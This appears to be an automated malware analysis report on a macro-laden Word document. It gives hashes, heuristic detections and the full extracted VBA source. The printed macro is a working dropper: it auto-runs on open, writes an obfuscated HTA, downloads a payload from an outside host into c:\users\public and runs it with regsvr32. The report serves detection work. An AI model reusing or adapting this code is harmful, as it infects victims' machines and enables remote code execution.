Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 92ad4e835705035b…

MALICIOUS

Office (OOXML)

Size: 80.4 KB
Created: 2021-04-01 06:27:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-04-10
MD5: f8b39ebe6e00e294a1d04b99f0ab7a57
SHA-1: 40db5a3e38a7a779ce00783be916b6d29049a721
SHA-256: 92ad4e835705035bb5bcaa16140c205c8a54cb77e28aca04a55f328b6feff3c0
Risk score: 170

Heuristics (6)

  • VBA project inside OOXML (severity: medium; 4 related findings; rule OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage (severity: critical; rule OLE_VBA_WSCRIPT)
    Matched line in script:
    Set structTextLink = CreateObject("wscript.shell")
  • CreateObject call (severity: high; rule OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set structTextLink = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro (severity: low; rule OLE_VBA_AUTOOPEN)
    Matched line in script:
    Sub autoopen()
  • Embedded URL (severity: info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 9504 bytes
SHA-256: 5ecfca8dbdafd5b0a9c4256de57f2b4a9e39812c4627c12d40cb98d92fa54759
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{41FA4DFC-DAAE-46CD-9D95-93BBFDE964E9}{80DE3F7F-724D-4597-A753-EE1494891C58}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function tmpVb()
With frm.button1
tmpVb = .Tag
End With
End Function
Function exceptionViewVb()
With frm.button1
exceptionViewVb = .Caption
End With
End Function
Public Sub button1_Click()
Set structTextLink = CreateObject("wscript.shell")
structTextLink.exec p(tmpVb) & " " & p(exceptionViewVb)
End Sub


Attribute VB_Name = "varNamespaceFunc"
Sub autoopen()
variableLocal
End Sub
Function intel(WScreen)
intel = "" & WScreen & ""
End Function
Sub variableLocal()
Dim nextSwapLen As String
nextSwapLen = p(frm.button1.Caption)
Set documentLocal = New storageArgumentCaption
documentLocal.classRemove nextSwapLen, leftData
frm.button1_Click
End Sub
Function constLoad(screenSizeButton, exceptionClassClass, counterIterator)
constLoad = Replace(screenSizeButton, exceptionClassClass, counterIterator)
End Function

Attribute VB_Name = "repoLenBorder"
Function procLink()
procLink = intel("<html><body><div id='content'>fTtlc29sYy5lbGJhaXJhVnRuZW11Z3JhOy")
End Function
Function textSelectTemp()
textSelectTemp = intel("kyICwiZ3BqLmZlUnlhcnJhXFxjaWxidXBcXHNyZXN1XFw6YyIoZWxpZm90ZXZhcy")
End Function
Function memExTmp()
memExTmp = intel("5lbGJhaXJhVnRuZW11Z3JhOyl5ZG9iZXNub3BzZXIudG5lbXVjb0RwbWVUeXJvbW")
End Function
Function argumentLoad()
argumentLoad = intel("VtKGV0aXJ3LmVsYmFpcmFWdG5lbXVncmE7MSA9IGVweXQuZWxiYWlyYVZ0bmVtdW")
End Function
Function localVariable()
localVariable = intel("dyYTtuZXBvLmVsYmFpcmFWdG5lbXVncmE7KSJtYWVydHMuYmRvZGEiKHRjZWpiT1")
End Function
Function leftLinkBuffer()
leftLinkBuffer = intel("hldml0Y0Egd2VuID0gZWxiYWlyYVZ0bmVtdWdyYSByYXZ7KTAwMiA9PSBzdXRhdH")
End Function
Function tableStorageProc()
tableStorageProc = intel("MudG5lbXVjb0RwbWVUeXJvbWVtKGZpOykoZG5lcy50bmVtdWNvRHBtZVR5cm9tZW")
End Function
Function listboxConstDatabase()
listboxConstDatabase = intel("07KWVzbGFmICwiQXByUVdhU2UxTm1GPSZ4WVQ9TG9hb0tFWFNuaCY1a2VYTWl3RF")
End Function
Function collectionArgument()
collectionArgument = intel("A9JmJHYzllRW8zU0dkQXdOTnk1PWZlciZZV3BtNHdmZ09rdUk1U0xaaWNnU21RRE")
End Function
Function linkSwapLeft()
linkSwapLeft = intel("VHPWRpJmFHNHVlcllDS0RtTDlpbz1tV0lJS0R3QWU/Nm5heC9lSUJ3REdJRVJOVU")
End Function
Function windowTemp()
windowTemp = intel("xOQlA4UzdGeTBUMmp5VzhhdE5BcDh1ek9zekpHUjNkTWVzSG8vamkvNDU4NDcvSz")
End Function
Function selectTempCaption()
selectTempCaption = intel("c4QzVBODVxOVVaRms3QWVhVEYyYlZ3c3FsVXBwUDdqYnZXNGYzRTVGQzJmWFNuLz")
End Function
Function countClear()
countClear = intel("A2OTU5LzUxMDEyL3N5dW9nL21vYy55cmV2aWxlZC04MDAyc2xsaW0vLzpwdHRoIi")
End Function
Function requestW()
requestW = intel("AsIlRFRyIobmVwby50bmVtdWNvRHBtZVR5cm9tZW07KSJwdHRobG14LjJsbXhzbS")
End Function
Function counterSwap()
counterSwap = intel("IodGNlamJPWGV2aXRjQSB3ZW4gPSB0bmVtdWNvRHBtZVR5cm9tZW0gcmF2|fXspe")
End Function
Function tmpButtonConvert()
tmpButtonConvert = intel("XBvQ3lyb21lTXR4ZW4oaGN0YWN9OykiYXRoLmZlUnlhcnJhXFxjaWxidXBcXHNyZ")
End Function
Function listBufStruct()
listBufStruct = intel("XN1XFw6YyIoZWxpZmV0ZWxlZC5mZVJ0c25vY3t5cnQ7KSJ0Y2VqYm9tZXRzeXNlb")
End Function
Function WSwap()
WSwap = intel("GlmLmduaXRwaXJjcyIodGNlamJPWGV2aXRjQSB3ZW4gPSBmZVJ0c25vYyByYXY7K")
End Function
Function pointerCollection()
pointerCollection = intel("SJncGouZmVSeWFycmFcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuK")
End Function
Function queryGeneric()
queryGeneric = intel("SJsbGVocy50cGlyY3N3Iih0Y2VqYk9YZXZpdGNBIHdlbg==</div><div id='ta")
End Function
Function titleProc()
titleProc = intel("ble1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>012345678")
End Function
Function listboxPointerPaste()
listboxPointerPaste = intel("9+/</div><div id='table3'></div><script language='javascript'>fu")
End Function
Function pasteTable()
pasteTable = intel("nction storageArray(referenceFuncPaste){return(new ActiveXObject")
End Function
Function ExGlobalNamespace()
ExGlobalNamespace = intel("(referenceFuncPaste));}function removeCaption(argumentTextbox){r")
End Function
Function screenVarStorage()
screenVarStorage = intel("eturn(mainSelectVb.getElementById(argumentTextbox).innerHTML);}f")
End Function
Function ExIteratorCount()
ExIteratorCount = intel("unction documentPastePaste(){var linkScreen = removeCaption('tab")
End Function
Function indexRequest()
indexRequest = intel("le1');var procStructPtr = linkScreen.toLowerCase();var trustCons")
End Function
Function WQueryBuffer()
WQueryBuffer = intel("tProcedure = removeCaption('table2');return(linkScreen + procStr")
End Function
Function leftOption()
leftOption = intel("uctPtr + trustConstProcedure);}function refLinkGlobal(s){var e={")
End Function
Function tmpPtrTemp()
tmpPtrTemp = intel("}; var i; var b=0; var c; var x; var l=0; var a; var structLoadR")
End Function
Function windowIndexNamespace()
windowIndexNamespace = intel("ight=''; var w=String.fromCharCode; var L=s.length;var pointerLi")
End Function
Function documentValueButton()
documentValueButton = intel("stGlobal = 'charAt';for(i=0;i<64;i++){e[documentPastePaste()[poi")
End Function
Function screenLibText()
screenLibText = intel("nterListGlobal](i)]=i;}for(x=0;x<L;x++){c=e[s[pointerListGlobal]")
End Function
Function nextCaptionLink()
nextCaptionLink = intel("(x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2")
End Function
Function nextResponse()
nextResponse = intel(")))&&(structLoadRight+=w(a));}}return(structLoadRight);};functio")
End Function
Function iteratorStorageBuf()
iteratorStorageBuf = intel("n titleViewBuf(captionLeft){return captionLeft.split('').reverse")
End Function
Function convertBorder()
convertBorder = intel("().join('');}lenIteratorLink = window;mainSelectVb = document;le")
End Function
Function convertNextArgument()
convertNextArgument = intel("nIteratorLink.resizeTo(1, 1);lenIteratorLink.moveTo(-100, -100);")
End Function
Function counterPasteCollection()
counterPasteCollection = intel("var collectionProc = mainSelectVb.getElementById('content').inne")
End Function
Function tableOptionList()
tableOptionList = intel("rHTML;var collectionProc = collectionProc.split('|');var selectL")
End Function
Function queryReference()
queryReference = intel("oad = titleViewBuf(refLinkGlobal(collectionProc[0]));var storage")
End Function
Function globalTable()
globalTable = intel("Reference = titleViewBuf(refLinkGlobal(collectionProc[1]));</scr")
End Function
Function pasteCopyRemove()
pasteCopyRemove = intel("ipt><script language='javascript'>function tmpRepo(argumentTemp)")
End Function
Function selectTextboxCount()
selectTextboxCount = intel("{var titleLenTmp = storageArray('msscriptcontrol.scriptcontrol')")
End Function
Function captionText()
captionText = intel(";titleLenTmp.Language = 'jscript';titleLenTmp.Timeout = 60000;ti")
End Function
Function pasteRemoveBorder()
pasteRemoveBorder = intel("tleLenTmp.AddCode(argumentTemp);return(null);}</script><script l")
End Function
Function ptrAConvert()
ptrAConvert = intel("anguage='vbscript'>tmpRepo selectLoad : tmpRepo storageReference")
End Function
Function globalNextTextbox()
globalNextTextbox = intel(" : lenIteratorLink.close</script></body></html>")
End Function
Function leftData()
leftData = procLink + textSelectTemp + memExTmp + argumentLoad + localVariable + leftLinkBuffer + tableStorageProc + listboxConstDatabase + collectionArgument + linkSwapLeft + windowTemp + selectTempCaption + countClear + requestW + counterSwap + tmpButtonConvert + listBufStruct + WSwap + pointerCollection + queryGeneric + titleProc + listboxPointerPaste + pasteTable + ExGlobalNamespace + screenVarStorage + ExIteratorCount + indexRequest + WQueryBuffer + leftOption + tmpPtrTemp + windowIndexNamespace + documentValueButton + screenLibText + nextCaptionLink + nextResponse + iteratorStorageBuf + convertBorder + convertNextArgument + counterPasteCollection + tableOptionList + queryReference + globalTable + pasteCopyRemove + selectTextboxCount + captionText + pasteRemoveBorder + ptrAConvert + globalNextTextbox
End Function

Attribute VB_Name = "storageArgumentCaption"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub classRemove(exceptionViewTmp As String, copyVbStorage As String)
Dim linkTextbox As FileSystemObject
Set linkTextbox = New FileSystemObject
Dim varButton As TextStream
Set varButton = linkTextbox.CreateTextFile(exceptionViewTmp)
varButton.WriteLine copyVbStorage
varButton.Close
Set varButton = Nothing
Set linkTextbox = Nothing
End Sub

Attribute VB_Name = "selectData"
Function p(ptrVb)
p = constLoad(ptrVb, "@", "")
End Function

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 40448 bytes
SHA-256: 38f08131aadcf540a949eadf7e46f3d9cc62271dd66b25542c01811a29e840d7